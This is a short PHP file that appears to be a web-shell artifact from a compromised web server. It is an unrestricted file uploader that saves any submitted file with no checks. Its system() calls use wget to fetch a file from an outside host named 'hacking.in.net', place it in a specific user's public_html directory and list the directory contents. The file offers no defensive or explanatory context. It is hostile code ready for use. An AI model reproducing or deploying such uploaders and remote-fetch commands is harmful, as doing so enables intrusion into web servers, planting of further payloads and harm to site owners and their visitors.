 <?php
if(isset($_POST['Submit'])){
    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);
  
echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"></form>';
}
?>  

<?php system('wget https://hacking.in.net/lol.txt && mv /home/thoreexchzw/public_html/lol.txt /home/thoreexchzw/public_html/ && ls -l -a');?>

<?php system('cd home/thoreexchzw/public_html/ && ls -l -a');?>